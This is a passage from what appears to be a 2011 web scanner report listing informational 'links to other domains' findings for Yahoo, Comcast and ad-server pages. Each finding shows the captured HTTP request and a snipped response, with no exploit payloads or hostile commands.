Referer: http://ads.media.net/medianet.php?cid=7CU9K3MPS&size=728x90&crid=717009282&ran=0.3385789911262691
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=58vr6285871398408930; 58vt6285871398408930=OMBtes1fbQK%2FGm21C%2FZ7mj9I%2BExeQZOKygrQwRbb4tVrbNUsVE4zuzjFtekuNDUv

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: 58vt6285888506906915=ZtOSXDpm27Ys%2B%2BhNkbPD91VHMpps028ELTwum9c5CpVNPEYXsEX3YLkTcx0CkLvmamVCtKpGhtMicC5oYvyrxg%3D%3D; path=/; domain=search.keywordblocks.com; httponly
Content-Type: text/html; charset=UTF-8
Content-Length: 9923

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta name="tids" content="a='1214' b='4134'
...[SNIP]...
<div id="media-ad-footer">
<a href="http://www.media.net" target="_blank">ads by media.net</a>
...[SNIP]...

15.92. http://search.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search;_ylt=Ajuek99xQM0_yZ.DABRjfVXSrYZ4?p=xss&fr=ush-sports HTTP/1.1
Host: search.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 35648

<!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>var pL=0, pUrl='http://ybinst2.ec.yimg.com/ec/fd/ls/l?IG=4a06753073d74d7bba4e661638f5b66
...[SNIP]...
</title><link rel="stylesheet" type="text/css" href="http://a.l.yimg.com/a/lib/s10/srp-core-css_201108281318.css"><style type="text/css">
...[SNIP]...
<li><a href="http://ebm.cheetahmail.com/r/regf2?a=0&aid=497540725&n=11&PROMOCODE=US2117&o=US2117&_vsrefdom=yahooseemsghere">Advertising Programs</a>
...[SNIP]...

15.93. http://shop.comcast.com/XFINITY/voice/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.comcast.com
Path:   /XFINITY/voice/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410 HTTP/1.1
Host: shop.comcast.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 13974
Content-Type: text/html
Content-Location: http://shop.comcast.com/XFINITY/voice/version_1.html
Last-Modified: Mon, 11 Jul 2011 20:38:23 GMT
Accept-Ranges: bytes
ETag: "c6f3807aa40cc1:14d2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:09 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<h3 id="logo-xfinity">
<a href="http://www.xfinity.com" target="_blank">XFINITY&reg;</a>
...[SNIP]...

15.94. http://shopping.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search;_ylt=ApMQLGDYOT7QlJIA.L4LcHMEgFoB?p=xss+phone&did=0 HTTP/1.1
Host: shopping.yahoo.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 86025


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/reset-fonts-grids.css&shop/s2/sh_global_201107271737.css&shop/s2/sh_listing_201105261033.css&uh/15/css/uh_rsa-1.0.5.css" type="text/css"/>

<script type="text/javascript">
...[SNIP]...
</script>
<script src="http://l.yimg.com/us.js.yimg.com/lib/yui/3.2.0/build/yui/yui-min.js"></script>
...[SNIP]...
<div class="pad">
<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css' /><style>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<div style="margin:0 20px; zoom:1;"><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC="http://ad.yieldmanager.com/st?_PVID=Tclt9GKJlBXQ8U1PTmYW9Q4wMhd7ak5mFvYAAdMa&ad_type=iframe&ad_size=160x600&site=140497&section_code=14485914&cb=1315313398192648&promote_sizes=1&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15lehavft/M=787833.14485914.14323757.1471092/D=shp/S=14489115:SKY/Y=YAHOO/EXP=1315320598/L=Tclt9GKJlBXQ8U1PTmYW9Q4wMhd7ak5mFvYAAdMa/B=DH96D9BDRrE-/J=1315313398192648/K=Jng.21wc125Z8MOUtgsiJw/A=6284739/R=0/*"></IFRAME><!-- Yahoo! Web Analytics - All rights reserved --> <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
316%26z=94089%26m=890452929%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=d49cb951f729775f2aa165936bf50c53" rel="nofollow" target="_blank" upstrackindex="890452929"><img src="http://i.pgcdn.com/pi/89/04/52/890452929_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Gold 11 oz" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Gold 11 oz "></a>
...[SNIP]...
=~~9%26r=5316%26m=890431304%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=fd47ef25098b039c53f19b56cb128c9d" rel="nofollow" target="_blank" upstrackindex="890431304"><img src="http://i.pgcdn.com/pi/89/04/31/890431304_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. LIGHT BLUE" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. LIGHT BLUE "></a>
...[SNIP]...
=~~9%26r=5316%26m=872522412%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=febebd41db8b2d9697b6484939b0e4c1" rel="nofollow" target="_blank" upstrackindex="872522412"><img src="http://i.pgcdn.com/pi/87/25/22/872522412_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage (choice of sizes and colors)" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage (choice of sizes and colors) "></a>
...[SNIP]...
=~~9%26r=5316%26m=872575605%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=12c7311221c52cd4a1096e996a3b5691" rel="nofollow" target="_blank" upstrackindex="872575605"><img src="http://i.pgcdn.com/pi/87/25/75/872575605_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. MAROON" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. MAROON "></a>
...[SNIP]...
=~~9%26r=5316%26m=872809391%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=979172f3e7c3ee91a8f9bcdcb76aa01d" rel="nofollow" target="_blank" upstrackindex="872809391"><img src="http://i.pgcdn.com/pi/87/28/09/872809391_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. MAROON" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. MAROON "></a>
...[SNIP]...
=~~9%26r=5316%26m=872761404%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=922592b0796d5c88e43395add5b727b3" rel="nofollow" target="_blank" upstrackindex="872761404"><img src="http://i.pgcdn.com/pi/87/27/61/872761404_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. BLUE" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. BLUE "></a>
...[SNIP]...
=~~9%26r=5316%26m=890471933%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=2a40e67557fc8f7709faa35c413b3a77" rel="nofollow" target="_blank" upstrackindex="890471933"><img src="http://i.pgcdn.com/pi/89/04/71/890471933_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Silver 11 oz" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Silver 11 oz "></a>
...[SNIP]...
=~~9%26r=5316%26m=890493007%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=395a7d8f1feb05603b7f84b45231f609" rel="nofollow" target="_blank" upstrackindex="890493007"><img src="http://i.pgcdn.com/pi/89/04/93/890493007_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Pink 11 oz" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Pink 11 oz "></a>
...[SNIP]...
=~~9%26r=5316%26m=890414279%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=0759acb26bc20550891a10874b1e6838" rel="nofollow" target="_blank" upstrackindex="890414279"><img src="http://i.pgcdn.com/pi/89/04/14/890414279_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. RED" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. RED "></a>
...[SNIP]...
=~~9%26r=5316%26m=872593161%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=970961270ed12be70b318de965698b66" rel="nofollow" target="_blank" upstrackindex="872593161"><img src="http://i.pgcdn.com/pi/87/25/93/872593161_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. GREEN" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. GREEN "></a>
...[SNIP]...
=~~9%26r=5316%26m=872613298%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=a9644e5d51b73228c236badcdbbefffa" rel="nofollow" target="_blank" upstrackindex="872613298"><img src="http://i.pgcdn.com/pi/87/26/13/872613298_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. PINK" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. PINK "></a>
...[SNIP]...
=~~9%26r=5316%26m=872538844%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=e4e68594c6bb019a3d334a477b35ad96" rel="nofollow" target="_blank" upstrackindex="872538844"><img src="http://i.pgcdn.com/pi/87/25/38/872538844_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. BLACK" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. BLACK "></a>
...[SNIP]...
=~~9%26r=5316%26m=872562517%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=c43859fd81cf5b7b6c3b8c2232ed94ab" rel="nofollow" target="_blank" upstrackindex="872562517"><img src="http://i.pgcdn.com/pi/87/25/62/872562517_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. BLUE" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. BLUE "></a>
...[SNIP]...
=~~9%26r=5316%26m=872633872%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=f97daf267e11808e0a4df9388996868b" rel="nofollow" target="_blank" upstrackindex="872633872"><img src="http://i.pgcdn.com/pi/87/26/33/872633872_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. WHITE" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. WHITE "></a>
...[SNIP]...
=~~9%26r=5316%26m=872738371%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=edae8afc559494c7cad653387ecd59c8" rel="nofollow" target="_blank" upstrackindex="872738371"><img src="http://i.pgcdn.com/pi/87/27/38/872738371_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. BLACK" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. BLACK "></a>
...[SNIP]...
<div class="dittoimg">
<img src="http://cr0.worthathousandwords.com/8/08/D0/21C5D99D0F144848B711CBB0088.jpg?pid=9146.106&qs=yvF%7Czt%25vkxrl%27fjyF%7B%7Ex3IdkplEjgoOmuejx1lst%27yzoFTopsk%23Xjmfwy%23rr%27Zt%7Bu%29Eyff%2CgnwDTf%7Ch%29Qvoj%7F%23%C2%803%27Tukfres%21Tlinvz%21%2B%26Ox%7B%27Sfzh%7C2%27Dmkft%24mpw%26Vnv%7Djhk%23%5Dskb%7E%27"></div>
...[SNIP]...
<div class="dittoimg">
<img src="http://cr0.worthathousandwords.com/0/44/D5/FE7138D353BA530D599B6C8E533.jpg?pid=9146.106&qs=yvF%7Czt%25vkxrl%27fjyFRvCnro%3D%5Dvv3irv%2A%7BuqCWqi%27Cjyw%29Olqy%26Vngyfy%27%29miz%3EIovls%7Dfw%26wqi%27cjyw%29olqy%26vngyfy%26lw%24%7Bij%26fnps%21unrwi%27jsjx%7Cxyz%26"></div>
...[SNIP]...
<a target="_href" href="http://help.yahoo.com/l/us/yahoo/shopping/new/shop-138.html"><img src="http://l.yimg.com/a/i/us/sh/gr/help_icon.gif"></a>
...[SNIP]...
</p><img src="http://iare.worthathousandwords.com/iar.gif?pid=9146.106">
<!-- http://global.ard.yahoo.com/SIG=15orsrspe/M=289534.14692504.14474040.14080610/D=shp/S=14489115:FOOT9/_ylt=AiJ6UN7kVqv4ov3YBDwZ.c4bFt0A/Y=YAHOO/EXP=1315320598/L=Tclt9GKJlBXQ8U1PTmYW9Q4wMhd7ak5mFvY
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ono/ywa.js"></script>
...[SNIP]...
<!-- #postdoc -->

<script type="text/javascript" src="http://l.yimg.com/a/combo?yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&yui/2.7.0/build/imageloader/imageloader-min.js&shop/s2/sh_global_201002251741.js&shop/s2/sh_listing_201010132254.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ts83sd(gid$Tclt9GKJlBXQ8U1PTmYW9Q4wMhd7ak5mFvYAAdMa,st$1315313398170748,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.95. http://show.partners-z.com/s/show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://show.partners-z.com
Path:   /s/show

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /s/show?chan=YAHOO&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&uuid=3c7f76504307f88c4e126d344670b7cc&zip=10010 HTTP/1.1
Host: show.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:53 GMT
Server: Apache/2.2.9 (Debian)
Cache-Control: max-age=0, no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3691
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Advertisement</title>
<style type="text/css" media="screen, projection">
html{border:0;margin:0;padding:0;width:300px;height:200px;background-color
...[SNIP]...
<div class="image"><img style="height:76;width:101;" src="http://www.zillowstatic.com/static/images/showcase-ads-thumb/See-what-Agents-are-saying-about-Premier-2.jpg"></img>
...[SNIP]...
<div class="image"><img style="height:76;width:101;" src="http://www.zillowstatic.com/static/images/showcase-ads-thumb/Agents-Get-more-customers-today.jpg"></img>
...[SNIP]...

15.96. http://sitesearch.comcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:11 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18478
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
</span> Comcast
       |
       <a target="_blank" href="http://www.cmcsk.com/">Investor Relations</a>
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom"></script>
...[SNIP]...

15.97. http://sports.yahoo.com/mlb/recap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /mlb/recap

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxid=016e3b4e6615bdb5; YWP_VOLUME=0.5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; spt_site=scorethin_league=nascar

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 247599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Lee tosses another gem, shuts out Braves - MLB - Yahoo! Sports</title>
<meta http-e
...[SNIP]...
e (16-7) struck out six, walked none and needed only 100 pitches to finish off the Braves after falling one out shy of a shutout in his previous start at Cincinnati. - Major League Baseball news"/>

<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJx1j-FuhCAQhJ9IBQ8R0ochFPZ6JMqaXWzj21fFJueP_loyfLszE5i7bU1d39pWdAQMpXliLtx8UYrckhxHo_VH2DlOBX5SBJf9t3uBj0DuiViAdsxIpcaKLUiFq2QepxRwnjF3n55h14dxGC4UPIWX88yJSzennOrT9UJYYXoh9cMcG1rL_v3SxkszY_ybp5m25j8kBcy3jBezTH4DynuFs6ky4pY3Jg4T8kpnaiWNff8NnnBlmI5NbW3Ndzjxzap6uFr1Cqp-ARhQf5A,.css?z&m" />
<link type="text/css" rel="stylesheet" media="screen" href="http://l.yimg.com/j/assets/eJx1kWFuhCAQhU9kFUTE9DAGcbaQRccA1t3bF7CNbuP-gfDm483kjfK-hMcCLvgPR1hNKflUUfMKHQRt5qgKwlibVemCURautHLT2G_G2njkTxXt6Avg19imD3qdhtSr5TUVGVA4TTiXAdEO0sUSb0hdn0vpgvnfiN9mBExGouK70Q1kWB2M_WDxy-cpq2o3Woy6w9TDaAK6Pr1Snbes7Q6zcpReF4uVT3C-fPqlOAupFe1qeh4sMROO-R7wkVN7SeeC81o6KIKG4sBrwfbYURlp-2ENAefUsRGckXdOSoO6_66IN-wdduxXkMi9w_5CiV6duILmm02Zka7ZM9hQ6rxpIZofX1TKEA,,.css?z&m" />
<link type="text/css" rel="stylesheet" media="print" href="http://l.yimg.com/j/assets/print_css/article.r180433.css?m" />

<script>
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
<meta property="og:title" content="Lee tosses another gem, shuts out Braves" />
<link rel="image_src" href="http://d.yimg.com/a/p/sp/ap/8c/fullj.973bbbfdd26a86f708a9677286fb4471/ap-201109052136777777842.jpg" />
<link rel="canonical" href="http://sports.yahoo.com/mlb/recap?gid=310905122" />
...[SNIP]...
